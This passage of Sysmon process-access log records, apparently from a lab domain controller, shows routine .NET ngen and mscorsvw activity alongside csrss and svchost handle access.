C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.366","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010B2460D00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.366\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010B2460D00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.366","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010B2460D00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010B2460D00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010B2460D00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.413\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00105C700B00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.413","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00105C700B00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.413\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00105C700B00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.413","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00105C700B00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010C44A0D00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010C44A0D00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.898\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010C8730B00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.898","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010C8730B00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:38.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010C8730B00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:38.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010C8730B00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
